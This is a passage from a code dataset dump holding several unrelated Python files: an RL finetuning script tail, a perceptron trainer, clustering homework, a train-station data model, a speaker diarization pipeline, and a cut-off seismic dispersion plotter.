save_path+'/OfflineRL/image'\n run_experiment(experiment,\n variant=variant,\n exp_prefix= args.algo_type+'-'+ args.env_name+'-' + args.exp_name,\n mode=\"here_no_doodad\",\n unpack_variant=False,\n use_gpu=True, \n gpu_id = args.gpu_id,\n snapshot_mode = 'all',\n \n base_log_dir = base_log_dir,\n )\n if is_dmc:\n vdisplay.stop()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"dsshim0125/s2p","sub_path":"examples/iql/mujoco_finetune.py","file_name":"mujoco_finetune.py","file_ext":"py","file_size_in_byte":16588,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"32032088036","text":"from NN.MultiLayerPerceptron import NeuralNet\nfrom NN.MultiLayerPerceptron import ACTIVATION\nimport json\nimport glob\nimport os\nimport numpy as np\n\ndef help(NN):\n print(\"train: Train Multilayer Perceptron with data from DATA/ folder\")\n print(\"init : Initialize Multilayer Perceptron\")\n print(\"reset: Reset Multilayer Perceptron to default values\")\n print(\"load : Load Multilayer Perceptron from file\")\n print(\"save : Save Multilayer Perceptron on file\")\n print(\"help : Shows his message\")\n return NN\n\ndef trainPerceptron(NN):\n dataFiles = []\n for file in glob.iglob(\"DATA/*.json\", recursive=True):\n dataFiles.append(file)\n if len(dataFiles) > 0:\n inputs = []\n outputs = []\n for file in dataFiles:\n with open(file, 'r') as jsonNNSource:\n data = json.load(jsonNNSource)\n if data[\"Dimensionality\"] == NN.inputLayerSize:\n inputs.append(data[\"InputList\"])\n outputs.append([float(data[\"Output\"]) * 0.1])\n else:\n continue\n print(\"\\t>> [Data successfully loaded from DATA/ folder...] ->\", len(outputs),\"files accepted.\")\n iterations = int(input(\"\\t>> #Iterations(LIMIT): \"))\n NN.train(np.array(inputs), np.array(outputs), iterations)\n print(\">> Training finished\")\n else:\n print(\">> ERROR: The folder \\\"DATA/\\\" is empty(no json file found).\")\n return NN\n\ndef initPerceptron(NN):\n arch = []\n nLayers = int(input(\"\\t>> #Layers: \"))\n for layer in range(nLayers):\n neurons = int(input(\"\\t>> #Neurons in layer#\" + str(layer) + \" -> \"))\n arch.append(neurons)\n params = int(input(\"\\t>> #Parameters in First Layer: \"))\n lRatio = float(input(\"\\t>> Learning Ratio: \"))\n activation = input(\"\\t>> Activation function: \")\n if(activation in ACTIVATION):\n NN = NeuralNet(arch, params, activation, lRatio)\n NN.reset()\n else:\n print(\"ERROR: That activation function id is not supported\")\n return NN\n\ndef resetPerceptron(NN):\n NN.reset()\n print(\">> Current M. Perceptron set on default parameters.\")\n return NN\n\ndef loadPerceptron(NN):\n name = input(\"\\t>> Name of M. Perceptron Info(JSON) file: \")\n print(\">> Successful loading\")if NN.loadFromFile(\"SavedPerceptrons/\" + name + \".json\") else print(\">> ERROR: The file doesn\\'t exist.\")\n return NN\n\ndef savePerceptron(NN):\n name = input(\"\\t>> Name of file: \")\n print(\">> File: \", name + \".json\", \"saved on\", \"SavedPerceptrons/\") if NN.saveOnFile(\"SavedPerceptrons/\" + name + \".json\") else print(\">> ERROR: The M. 
perceptron hasn\\'t been initialized.\")\n return NN\n\nif __name__ == \"__main__\":\n\n neuralNet = NeuralNet([1,2,1], 1, \"tanh\", 0.5)\n\n controlPanel = {\"train\": trainPerceptron,\n \"init\" : initPerceptron,\n \"reset\": resetPerceptron,\n \"load\" : loadPerceptron,\n \"save\" : savePerceptron,\n \"help\" : help}\n os.system('cls')\n closed = False\n while(not closed):\n print(\"<PCSTitle>: {OCR Perceptron [Trainer]}\")\n print(\"-\"*40)\n neuralNet.getStatus()\n print(\"-\"*40)\n key = input(\">> Write a command: \")\n if key == \"exit\":\n print(\"--- PROGRAM FINISHED ---\")\n exit(0)\n elif key in controlPanel:\n neuralNet = controlPanel[key](neuralNet)\n else:\n print(\">> Comando\", key, \"desconocido, intente nuevamente.\")\n os.system('pause')\n os.system('cls')\n\n ","repo_name":"rodRigocaU/Curso-de-IA","sub_path":"Tarea 004 - Perceptron OCR for Digits/App/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":3326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"5810449455","text":"#!/usr/bin/env python3\n\ndpoints = [\n (1,3),\n (2,3),\n (3,3),\n (1,2),\n (2,2),\n (3,2),\n (5,2),\n (5,1),\n (6,1)\n]\n\ndef distance(list1, list2):\n _dist = 0\n for a, b in zip(list1, list2):\n _dist += (a - b) ** 2\n return _dist ** (1 / 2)\n\ndef centroid(points):\n _sums = []\n for i,_ in enumerate(points[0]):\n _sum = 0\n for p in points:\n _sum += p[i]\n _sums.append(_sum)\n\n for i,s in enumerate(_sums):\n _sums[i] = s / len(points)\n\n return tuple(_sums)\n\ndef is_core(point, distance_threshold, mincount, points):\n _num = 0\n for p in points:\n if (distance(p, point) <= distance_threshold):\n _num += 1\n return True if _num >= mincount else False\n\ndef is_boundary(point, distance_threshold, cores):\n for c in cores:\n if (distance(c, point) <= distance_threshold):\n return True\n return False\n\nif __name__ == '__main__':\n dist = 1\n count = 3\n\n ugly_cheating = []\n cores = []\n\n print((' ' * 4) + ' '.join(['R{}:'.format(x + 1) for x in range(9)]))\n for i,p in enumerate(dpoints):\n print('R{}: '.format(i + 1) + ' '.join([format(distance(p, x), '.2f') for x in dpoints]))\n\n for p in dpoints:\n if is_core(p, dist, count, dpoints):\n cores.append(p)\n ugly_cheating.append('core')\n else:\n ugly_cheating.append('')\n\n for i,p in enumerate(dpoints):\n if ugly_cheating[i] != 'core':\n if is_boundary(p, dist, cores):\n ugly_cheating[i] = 'boundary'\n else:\n ugly_cheating[i] = 'noise'\n\n print(ugly_cheating)\n","repo_name":"pegurnee/2016-01-667","sub_path":"homework/4_hw/src/9.py","file_name":"9.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"35247240419","text":"import re, logging\nfrom ffe import config\nfrom google.appengine.ext import ndb\nfrom google.appengine.api import memcache\nfrom ffe.markup import XMLElement, XMLDocument, XMLImporter\nfrom ffe.ffe_time import cet_from_string\nfrom ffe.gae import remote_fetch\nfrom ffe.rest_resources import PublicResource, DataType, NoValidIdentifierError\nfrom TSStationPosition import TSStationPosition\nfrom TSStationAgent import TSStationAgent\n\n\nclass TSStation(PublicResource):\n url_name = 'station'\n agent_url = '/agent/station'\n identifier_regex = re.compile('([a-z]{2})\\.([a-z]{1,5})$')\n _positions = None\n\n # datastore properties:\n names = ndb.StringProperty(repeated=True)\n display_index = ndb.IntegerProperty(indexed=False, default=0)\n 
label_angle = ndb.IntegerProperty(indexed=False)\n importance = ndb.IntegerProperty()\n wiki_string = ndb.StringProperty(indexed=False)\n opened_string = ndb.StringProperty()\n\n # ------------ Object lifecycle ------------------------------------------------------------------------------------\n\n def delete(self):\n for position in self.positions:\n position.delete()\n super(TSStation, self).delete()\n\n # ------------ Object metadata -------------------------------------------------------------------------------------\n\n @property\n def country(self):\n return self.id_part(1)\n\n @property\n def code(self):\n return self.id_part(2)\n\n # ------------ Finding instances -----------------------------------------------------------------------------------\n\n @classmethod\n def active_ids(cls):\n memcache_key = '%s_active_ids' % cls.__name__\n ids_list = memcache.get(memcache_key)\n if not ids_list:\n ids_list = []\n for key in cls.query().filter(TSStation.importance <= 3).iter(keys_only=True):\n ids_list.append(key.id())\n memcache.set(memcache_key, ids_list)\n return ids_list\n\n @classmethod\n def id_for_name(cls, name):\n try:\n return cls.valid_identifier(name)\n except NoValidIdentifierError:\n for key in cls.query().filter(TSStation.names == name).iter(keys_only=True):\n return key.id()\n\n # ------------ Object properties -----------------------------------------------------------------------------------\n\n @property\n def name(self):\n if self.names:\n return self.names[0]\n\n @name.setter\n def name(self, new_name):\n current_display_name = self.display_name\n updated_names = [new_name]\n for existing_name in self.names:\n if existing_name != new_name:\n updated_names.append(existing_name)\n self.names = updated_names\n if current_display_name:\n self.display_name = current_display_name\n\n @property\n def display_name(self):\n if self.names and len(self.names) > self.display_index:\n return self.names[self.display_index]\n\n @display_name.setter\n def display_name(self, new_display_name):\n found = False\n for i in range(len(self.names)):\n if self.names[i] == new_display_name:\n self.display_index = i\n found = True\n break\n if not found:\n self.display_index = len(self.names)\n self.names.append(new_display_name)\n\n def add_alias(self, new_alias):\n if new_alias in self.names:\n return False\n else:\n self.names.append(new_alias)\n return True\n\n @property\n def wiki_link(self):\n if self.wiki_string:\n components = self.wiki_string.split(':')\n if len(components) == 2:\n string_with_underscores = re.sub(' ', '_', components[1])\n return 'http://%s.wikipedia.org/wiki/%s' % (components[0], string_with_underscores)\n\n @property\n def agent(self):\n return TSStationAgent.get(self.id_)\n\n @property\n def positions(self):\n if self._positions is not None:\n return self._positions\n else:\n self._positions = TSStationPosition.query(TSStationPosition.station_key == self.key).fetch(20)\n return self._positions\n\n def create_position(self, route_code):\n self._positions = None\n return TSStationPosition.new(station_code=self.code, route_code=route_code)\n\n # ------------ Reading content -------------------------------------------------------------------------------------\n\n @classmethod\n def xml_handler(cls):\n return StationImporter()\n\n @classmethod\n def update_stations(cls, file_name=None):\n \"\"\"\n Updates the current stations with xml-formatted data either from NS-API or a specified file.\n Stations that don't appear in the new data will be deleted.\n :param 
file_name: Name of the source ('None' redirects to NS-API)\n \"\"\"\n if file_name:\n fp = open(file_name, 'r')\n xml_string = fp.read()\n else:\n xml_string = remote_fetch(url=config.NSAPI_STATIONS_URL,\n headers=config.NSAPI_HEADER,\n deadline=config.NSAPI_DEADLINE)\n cls.update_multi(xml_string, DataType.xml)\n\n def update_with_dictionary(self, dictionary):\n changes = False\n\n names = dictionary.get('names')\n if names is None:\n name = dictionary.get('name')\n alias = dictionary.get('alias')\n if alias:\n if self.add_alias(name):\n changes = True\n else:\n if self.name != name:\n self.name = name\n changes = True\n\n if len(self.positions) == 0:\n lat = dictionary.get('lat')\n lon = dictionary.get('lon')\n if lat is not None and lon is not None:\n self.update_positions([{'km': 0.0, 'route': 'nl.xx00', 'lat': lat, 'lon': lon}])\n changes = True\n\n else:\n if names != self.names:\n self.names = names\n changes = True\n\n display_index = dictionary.get('displayIndex')\n if display_index != self.display_index:\n self.display_index = display_index\n changes = True\n\n label_angle = dictionary.get('labelAngle')\n if label_angle != self.label_angle:\n self.label_angle = label_angle\n changes = True\n\n wiki_string = dictionary.get('wikiString')\n if wiki_string != self.wiki_string:\n self.wiki_string = wiki_string\n changes = True\n\n opened_string = dictionary.get('openedString')\n if opened_string != self.opened_string:\n self.opened_string = opened_string\n changes = True\n\n if self.update_positions(dictionary.get('positions', [])):\n changes = True\n\n importance = dictionary.get('importance')\n if importance is not None and importance != self.importance:\n self.importance = importance\n changes = True\n elif importance is self.importance is None:\n self.importance = 3\n changes = True\n\n return changes\n\n def update_positions(self, new_positions):\n changes = False\n old_positions = self.positions\n all_positions = []\n updated_positions = []\n for dictionary in new_positions:\n current_position = None\n route_id = dictionary['route']\n for position in old_positions:\n if position.route_id == route_id:\n current_position = position\n break\n if current_position is not None:\n old_positions.remove(current_position)\n else:\n route_code = route_id.split('.')[1]\n current_position = self.create_position(route_code)\n\n current_changes = False\n km = dictionary['km']\n if current_position.km != km:\n current_position.km = km\n current_changes = True\n coordinate = (dictionary['lat'], dictionary['lon'])\n if current_position.coordinate != coordinate:\n current_position.coordinate = coordinate\n current_changes = True\n all_positions.append(current_position)\n if current_changes:\n changes = True\n updated_positions.append(current_position)\n self._positions = None\n for position in old_positions:\n position.delete()\n if updated_positions:\n ndb.put_multi(updated_positions)\n return changes\n\n # ------------ Writing content -------------------------------------------------------------------------------------\n\n @property\n def xml(self):\n return XMLElement('station', {'id': self.id_, 'name': self.name, 'importance': self.importance})\n\n @property\n def xml_document(self):\n document = XMLDocument('routeItems')\n document.root.add(self.xml)\n return document\n\n def dictionary_from_object(self):\n dictionary = {'id': self.id_}\n\n if self.names is not None:\n dictionary['names'] = self.names\n\n if self.display_index is not None:\n dictionary['displayIndex'] = self.display_index\n\n 
if self.label_angle is not None:\n dictionary['labelAngle'] = self.label_angle\n\n if self.importance is not None:\n dictionary['importance'] = self.importance\n\n if self.wiki_string is not None:\n dictionary['wikiString'] = self.wiki_string\n\n if self.opened_string is not None:\n dictionary['openedString'] = self.opened_string\n\n positions = []\n for position in self.positions:\n positions.append(position.dictionary_from_object(perspective='station'))\n if positions:\n dictionary['positions'] = positions\n\n return dictionary\n\n\n# ====== XML Parser ====================================================================================================\n\nclass StationImporter(XMLImporter):\n\n now = None\n from_rail_atlas = False\n name = None\n code = None\n country = None\n alias = False\n importance = None\n lat = None\n lon = None\n\n def active_xml_tags(self):\n return ['station']\n\n def existing_objects_dictionary(self):\n return TSStation.objects_dictionary()\n\n def key_for_current_object(self):\n if self.code and self.country == 'nl':\n return '%s.%s' % (self.country, self.code)\n\n def create_new_object(self, key):\n return TSStation.new(key)\n\n def start_xml_element(self, name, attrs):\n if name == 'routeItems':\n self.from_rail_atlas = True\n\n elif name == 'TAStation':\n self.from_rail_atlas = True\n\n elif name == 'station':\n if self.from_rail_atlas:\n identifier = attrs.get('id')\n comps = identifier.split('.')\n self.country = comps[0]\n self.code = comps[1]\n self.name = attrs.get('name')\n self.importance = int(attrs.get('importance'))\n\n elif name == 'unit_test':\n now_string = attrs.get('timestamp')\n self.now = cet_from_string(now_string)\n\n def end_xml_element(self, name):\n if not self.from_rail_atlas:\n if name == 'name':\n self.name = ''.join(self.data)\n\n elif name == 'code':\n self.code = ''.join(self.data).lower()\n\n elif name == 'country':\n self.country = ''.join(self.data).lower()\n\n elif name == 'alias':\n string = ''.join(self.data).lower()\n if string == 'true':\n self.alias = True\n else:\n self.alias = False\n\n elif name == 'lat':\n self.lat = float(''.join(self.data))\n\n elif name == 'long':\n self.lon = float(''.join(self.data))\n\n def update_object(self, existing_object, name):\n dictionary = {'alias': self.alias,\n 'name': self.name,\n 'importance': self.importance,\n 'lat': self.lat,\n 'lon': self.lon}\n if existing_object.update_with_dictionary(dictionary):\n self.changes = True\n\n def save_objects(self):\n assert len(self.old_objects) < 10\n if self.updated_objects:\n ndb.put_multi(self.updated_objects.values())\n for station in self.old_objects.itervalues():\n station.delete()\n\n","repo_name":"firstflamingo/treinenaapje","sub_path":"app/TSStation.py","file_name":"TSStation.py","file_ext":"py","file_size_in_byte":12865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"72441161093","text":"import random\nimport sys\nimport os\nsys.path.insert(0,'./..')\nimport numpy as np\nimport math\nimport soundfile as sf\nfrom python_speech_features import mfcc\nfrom numpy.linalg import inv\nfrom peakdetect import peakdet\nfrom readcsv import getcsvfeat\nimport webrtcvad\nfrom seg_vad import segmentvad\nfrom clus_vad import clus_vad1\nfrom bic_single_gaus import bicdist_single\nfrom funcVAD import vadfn\nfrom SpecchSEgs import getSpeechSEgments\nfrom read import readVADFile\nfrom clus_vad_spk import clus_vad1_spk\n\n\ndef 
diar_vad(wav_file,feat_file,pfo,pflin,tag,numfrwin,nsh,MDT,vadtxt,spkrs,filetype,verbose,feattype,amplitude,dist_1):\n\n\n #Making a webrtcvad Object. For more information , Visit: https://github.com/wiseman/py-webrtcvad\n vad = webrtcvad.Vad()\n vad.set_mode(0) #Setting Mode 0 of 'Aggresiveness'. Visit: https://github.com/wiseman/py-webrtcvad\n\n x, fs = sf.read(wav_file)\n #Reading The wav File. x=array of samples of the wav file(decimal). fs= sampling frequency\n\n\n #Feature Extraction\n\n\n\n\n if(feattype=='csv'):\n \n if(feat_file=='NoneProvided'):\n\n #If no external Features Provided by the User, System will extract the feature using python_speech_features Library.\n #More information on the Library : https://github.com/jameslyons/python_speech_features\n #x=wav file(array of decimals)\n #fs=sampling Frequency\n #0.03=Window Size in seconds ; AKA 30mS\n #0.01=Window Shift in seconds ; AKA 10ms\n #13= Dimension of MFCC Feature\n \n feat = mfcc(x,fs,0.03,0.010,13)\n feat= feat.transpose()#feat-->FEATURE VARIABLE. Shape=(dimension, samples)\n \n nsh=0.010 #nsh Variable--> Indiactes window shift interval\n print('using Inbuilt MFFCs as features')\n else:\n feat=getcsvfeat(feat_file) #Gets the features from the CSV File path which is provided\n #feat-->FEATURE VARIABLE. Shape=(dimension, samples) \n\n #When CSV File is provided, but the Window SHift AKA nsh is not provided (nsh==1 by default(see DIAR_MAIN.py)), throw an ERROR\n \n if(nsh==1):\n print('ERROR, please enter -res (Window Shift) as Features are provided')\n sys.exit()\n print('Using provided Features')\n \n elif(feattype=='numpy'):\n feat=feat_file\n else:\n print('ERROR, please ENTER Feature options correctly . (feattype)-->indicate numpy or csv')\n sys.exit()\n \n \n \n \n\n #get the Frame By Frame VAD Output(For each overlapping frame, do VAD and get '1==speech' or '0==no Speech' For each overlapping frame\n\n if(vadtxt=='1'):\n vad_flag,feat_1,numfram=vadfn(x,nsh,fs,feat)\n print('Performing VAD')\n #vadtxt-->Filename containing VAD Information.If no File Name provided, vadtxt=1 by default. If no file given, perform VAD.\n #feat---> feature file (Dim,sample)\n #vadfn --> performs VAD using the webrtcvad Library\n #vad_flag--> Frame by Frame VAD info for each overlapping frame.Eg. vad_flag= array[1 0 0 0 1 1 1 0 1 0 1 1 1 0 0.......]\n #numfram-->Number of samples(feature samples) taken into account. numfram= min(number of VAD samples, Number of Feature Samples). Done to avoid Mismatch\n #feat_1-->Returns features with 'numfram' samples . len(feat_1)=numfram\n \n \n \n else:\n vad_flag,feat_1,numfram=readVADFile(vadtxt,feat)\n #vadtxt-->Filename containing VAD Information.\n #vad_flag--> Frame by Frame VAD info for each overlapping frame.Eg. vad_flag= array[1 0 0 0 1 1 1 0 1 0 1 1 1 0 0.......]\n #numfram-->Number of samples(feature samples) taken into account. numfram= min(number of VAD samples, Number of Feature Samples). Done to avoid Mismatch\n #feat_1-->Returns features with 'numfram' samples .len(feat_1)=numfram\n print('Number of VAD Samples : '+str(len(vad_flag)))\n print('Number of Extracted Feature Samples : '+str(len(feat[1,:])))\n print('Number of Samples Considered : '+str(numfram)) \n\n speech_seg,speech_seg_start,speech_seg_end=getSpeechSEgments(vad_flag,MDT,feat_1,numfram)\n #getSpeechSEgments--> Analyses the VAD information and gets only the SPEECH Segments.\n #MDT-->Minimum Duration Time. Used for smoothing out the VAD output. 
if Silence Time<MDT----> Treat as Voice\n\n #speech_seg--> Returns Speech Segment windows.\n #Each Segment --> Features of the 'Voiced Part'.\n #eg. ---> speech_seg[0].shape=(13,4562) ; speech_seg[1].shape=(13,2341). speech_seg[i]-->returns 'ith' Speech Segment\n #speech_seg_start-->Start Time of Each Speech Segment\n #speech_seg_end-->End Time of Each Speech Segment\n\n\n clus_final=[]#Will contain the various speech segments AFTER Segmentation+Linear Clustering\n frms_start=[]#Start Frame of each speech segment after Segmentation+Linear Clustering\n frms_end=[]#End Frame of each speech segment after Segmentation+Linear Clustering\n\n #Performing Segmentation + Linear Clustering in Each of the Speech Segments\n for u in range(0,len(speech_seg)):\n \n x,y=speech_seg[u].shape\n #y--->Number of Samples in 'speech_seg[u]'\n \n if(y<(numfrwin+30)):#If Number of samples<numfrwin+30, DONT do segmentation+Linear CLustering. Add the entire speech segment. eg., if numfram=100,and nsh=0.010; 130*0.010=1.3s. If segment size less than 1.3s, add entire segment as it is\n \n clus_final.append(speech_seg[u])\n frms_start.append(speech_seg_start[u])\n frms_end.append(speech_seg_end[u])\n else:\n time_stamp,frame_stamp,ts_lin,fs_lin,clus,cluslin=segmentvad( speech_seg[u],amplitude,dist_1,numfrwin,nsh,pflin,fs)\n #segmentvad-->Does Segmeatation followed by linear clustering on the speech segments.\n\n #Outputs\n #time_stamp-->Time Stamp of change points followed by ONLY Segmentation\n #frame_stamp-->Frame Stamp of change points followed by ONLY Seg,Segmentation\n #ts_lin-->Time Stamp of change points followed by Segmentation AND Linear Clustering\n #fs_lin-->Frame Stamp of change points followed by Segmentation AND Linear Clustering\n #clus-->Speech Clusters followed by ONLY Segmentation\n #cluslin-->Speech Clusters followed by Segmentation AND Linear Clustering\n\n #Inputs\n #speech_seg[i]--->ith speech segment\n #amplitude-->Amplitude Threshold for Peak Detection ( See documentation of peakdetect.py for more information)\n #dist_1-->Distance Threshold for Peak Detection ( See documentation of peakdetect.py for more information)\n #numfrwin--> Segmentation Window Size. eg. 
numfrwin=100;nsh=0.010 ;Segmentation Window= 100*0.010=1s\n #nsh--> frame shift (0.010 default)\n #pflin--> Penalty Factor For Linear CLustering.(in BIC formula)\n #fs-->sampling frequency\n \n \n \n for t in range(0,len(cluslin)):\n clus_final.append(cluslin[t])\n\n #calculating Frame Start and Frame End for each 'segmented+Linear clustered' speech segment\n if(len(cluslin)==1):\n frms_start.append(speech_seg_start[u])\n frms_end.append(speech_seg_end[u])\n \n else:\n \n \n nst=0\n nen=fs_lin[0]\n frms_start.append(nst+speech_seg_start[u])\n frms_end.append(nen+speech_seg_start[u])\n \n\n if(len(fs_lin)==1):\n nst=fs_lin[0]\n nen=speech_seg_end[u]-speech_seg_start[u]\n frms_start.append(nst+speech_seg_start[u])\n frms_end.append(nen+speech_seg_start[u])\n else:\n for y in range(1,len(fs_lin)):\n nst=fs_lin[y-1]\n nen=fs_lin[y]\n frms_start.append(nst+speech_seg_start[u])\n frms_end.append(nen+speech_seg_start[u])\n nst=fs_lin[len(fs_lin)-1]\n nen=speech_seg_end[u]-speech_seg_start[u]\n frms_start.append(nst+speech_seg_start[u])\n frms_end.append(nen+speech_seg_start[u])\n \n \n \n\n #Performing Hierarchical Clustering on the Speech Signals\n #Two ways of terminating Clustering\n if(spkrs=='None'):\n clusters_spkrs=clus_vad1(clus_final,pfo,tag,verbose) #End Point of Clustering is based on BIC Value; If delta(BIC)>0; Stop Merging.\n #clusters_spkrs----> The Final CLusters of the speakers AFTER Hierarchical CLustering\n else:\n clusters_spkrs=clus_vad1_spk(clus_final,pfo,tag,int(float(spkrs)),verbose)#End Point of Clustering ---> Number of clusters= Number of speakers\n #clusters_spkrs----> The Final CLusters of the speakers AFTER Hierarchical CLustering\n \n for k in range(len(clusters_spkrs)):\n print(clusters_spkrs[k].shape)\n\n \n flag_pt=[]\n #Doing Speaker Matching; comparing each speech segment with the speaker clusters and assign speaker ID\n for i in range(0,len(clus_final)):\n kld=[]\n for j in range(0,len(clusters_spkrs)): #all the spkr clusters\n \n kld.append(bicdist_single(clus_final[i],clusters_spkrs[j],pfo))\n \n klin=min(kld)\n index=kld.index(klin)\n flag_pt.append(index)#flag_pt contains speaker ID\n \n\n\n #Write to File\n pf1=pfo\n str12='./results/'+tag+'_'+str(spkrs)+'_'+str(pfo)+'_'+str(pflin)+'.txt'\n text_file = open(str12, \"w\")\n\n data_time=np.zeros((len(clus_final),3))\n data_frame=np.zeros((len(clus_final),3))\n \n for i in range(0,len(clus_final)):\n \n start=frms_start[i]*nsh\n end=frms_end[i]*nsh\n dur=end-start\n \n spkid=flag_pt[i]\n data_time[i,0]=spkid\n data_time[i,1]=start\n data_time[i,2]=end-nsh\n\n data_frame[i,0]=spkid\n data_frame[i,1]=frms_start[i]\n data_frame[i,2]=frms_end[i]-1\n if(filetype=='rttm'):\n str1='SPEAKER '+ tag+' 1 '+str(start)+' '+str(dur)+' <NA> <NA> '+str(spkid)+' <NA> <NA>'\n text_file.write(str1+\"\\n\")\n## else:\n## str1='SP'+str(spkid)+' '+str(frms_start[i])+' '+str(frms_end[i])\n## text_file.write(str1+\"\\n\")\n\n \n #print(str(len(feat[1,:]))+' feat_1 '+str(len(feat_1[1,:])))\n data_perfrm=[]\n if(data_frame[0,1]!=0):\n for j in range(0,data_frame[0,1]):\n data_perfrm.append('SIL')\n \n \n\n\n datafrm_sil=[]\n datatim_sil=[]\n for i in range(0,len(data_frame[:,1])):\n\n size=data_frame[i,2]-data_frame[i,1]+1\n datafrm_sil.append(data_frame[i])\n datatim_sil.append(data_time[i])\n\n for k in range(0,int(size)):\n data_perfrm.append(data_frame[i,0])\n \n\n if(i<len(data_frame[:,1])-1):\n \n size2=data_frame[i+1,1]-data_frame[i,2]\n \n if(size2>1):\n tmp=np.array(['SIL',data_frame[i,2]+1,data_frame[i+1,1]-1])\n 
datafrm_sil.append(tmp) \n tmp2=np.array(['SIL',(data_frame[i,2]+1)*nsh,(data_frame[i+1,1]-1)*nsh])\n datatim_sil.append(tmp2)\n for j in range(0,int(size2)-1):\n data_perfrm.append('SIL')\n \n \n \n \n \n datafrm_sil=np.array(datafrm_sil)\n datatim_sil=np.array(datatim_sil)\n\n for n in range(0,len(datafrm_sil)):\n if(filetype!='rttm'):\n if(datafrm_sil[n,0]!='SIL'):\n str1='SP'+str(int(float(datafrm_sil[n,0])))+' '+str((datafrm_sil[n,1]))+' '+str((datafrm_sil[n,2]))\n text_file.write(str1+\"\\n\")\n else:\n str1=str((datafrm_sil[n,0]))+' '+str((datafrm_sil[n,1]))+' '+str((datafrm_sil[n,2]))\n text_file.write(str1+\"\\n\")\n \n \n \n text_file.close()\n return data_time,data_frame,data_perfrm,datafrm_sil,datatim_sil\n\n\n\n\n","repo_name":"gdebayan/Diarization_BIC","sub_path":"DIARIZATION/diarization_VAD/diarization_vad.py","file_name":"diarization_vad.py","file_ext":"py","file_size_in_byte":12427,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"44"} +{"seq_id":"18115674314","text":"import numpy\n\nclass Brain: \n def __init__(self, inputs):\n self.input_layers_size = inputs + 1\n self.hidden_layers_size = 3 + 1\n self.output_layers_size = 1 \n\n self.input_weights = numpy.random.randn(self.input_layers_size, self.hidden_layers_size)\n self.hidden_weights = numpy.random.randn(self.hidden_layers_size, self.output_layers_size)\n\n def sigmoid(self, x):\n return 1/(1 + numpy.exp(-x))\n\n def feedfoward(self,inputs_array):\n inputs_array.append(1)\n\n hidden_activations = self.sigmoid(numpy.dot(inputs_array,self.input_weights))\n\n hidden_activations[len(hidden_activations)-1] = 1\n\n outputs = self.sigmoid(numpy.dot(hidden_activations, self.hidden_weights))\n\n return self.sigmoid(outputs)","repo_name":"YannCedric/Birds-Neural-Net","sub_path":"Brain.py","file_name":"Brain.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"37664014604","text":"#!/usr/bin/env python\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport argparse\nfrom scipy.stats import gaussian_kde\nimport os\nfrom objective_function import (ObjectiveFunctionDerivativeUsed, Forward)\n\nimport yaml\n\nparams = {'axes.labelsize': 14,\n 'axes.titlesize': 16,\n 'xtick.labelsize': 12,\n 'ytick.labelsize': 12,\n 'legend.fontsize': 14}\nplt.rcParams.update(params)\n\n\ndef kde_scipy(x, x_grid, weights):\n if len(x) == 1:\n ret = np.zeros_like(x_grid)\n ind = np.argmin(np.abs(x[0] - x_grid))\n ret[ind] = 1.0\n else:\n if np.all(np.isclose(x, x[0])):\n x += 1.0e-10 * np.random.random(len(x))\n kde = gaussian_kde(x, weights=weights)\n ret = kde.evaluate(x_grid)\n return ret\n\n\ndef weighted_avg_and_std(values, weights):\n \"\"\"\n Return the weighted average and standard deviation.\n\n values, weights -- Numpy ndarrays with the same shape.\n \"\"\"\n average = np.average(values, weights=weights)\n # Fast and numerically precise:\n num = len(values)\n if num == 1:\n variance = 0\n else:\n variance = np.average(\n (values - average)**2, weights=weights) * num / (num - 1)\n return (average, np.sqrt(variance))\n\n\ndef plot_disp(config, sid, all_disp, file_out, no_show):\n config_plot = config['plot']\n dir_output = config['dir_output']\n wave_type = config.get('wave_type', 'rayleigh')\n dir_output = os.path.join(dir_output, sid)\n\n results = [\n np.load(dir_output + '/' + f, allow_pickle=True)\n for f in os.listdir(dir_output)\n ]\n misfit = np.asarray([r['fi'] for r in results])\n 
roots_inv = [r['ri'].item() for r in results]\n models_inv = [r['mi'] for r in results]\n weight = np.exp(-misfit)\n weight /= np.sum(weight)\n\n if len(weight) == 1:\n ratio_show = 1\n else:\n ratio_show = config_plot['percentage_show'] * 0.01\n num_show = int(misfit.shape[0] * ratio_show)\n ind_sort = np.argsort(weight)[::-1][:num_show]\n weight = weight[ind_sort]\n weight = weight / np.amax(weight) * 0.2\n roots_inv = [roots_inv[i] for i in ind_sort]\n models_inv = [models_inv[i] for i in ind_sort]\n\n num_show = int(misfit.shape[0] * ratio_show)\n\n # weight *= 1.0 / np.mean(weight) * 0.05\n # weight[weight > 0.1] = 0.1\n dir_data = config['dir_data']\n file_data = os.path.join(dir_data, '{:s}.txt'.format(sid))\n data = np.loadtxt(file_data)\n\n _, ax = plt.subplots()\n modes = []\n\n if all_disp:\n weights_mode = config.get(\"weights_mode\", None)\n for ind, (w, model) in enumerate(zip(weight, models_inv)):\n forward = Forward(model, data, wave_type)\n forward.compute(weights_mode)\n disp = forward.disp\n for m, val in disp.items():\n modes.append(m)\n pinv, = ax.plot(val[:, 0], val[:, 1], 'k-', alpha=w)\n else:\n for ind, (w, r) in enumerate(zip(weight, roots_inv)):\n if ind >= num_show:\n continue\n for mode, v in r.items():\n rinv = np.array(v)\n if np.size(rinv) > 0:\n pinv, = ax.plot(rinv[:, 0], rinv[:, 1], 'k-', alpha=w)\n modes.append(mode)\n\n modes = set(modes)\n for mode in modes:\n disp_m = data[data[:, 2].astype(int) == mode]\n pdata, = ax.plot(disp_m[:, 0], disp_m[:, 1], 'r.', alpha=0.5)\n\n plt.legend(handles=[pinv, pdata],\n labels=['inversion', 'data'],\n loc='lower left')\n\n plt.xlabel('Frequency (Hz)')\n plt.ylabel('Phase velocity (km/s)')\n plt.tight_layout()\n if file_out:\n plt.savefig(file_out, dpi=300)\n if not no_show:\n plt.show()\n\n\ndef plot_model(config_inv, sid, plot_init, file_out, no_show):\n config_plot = 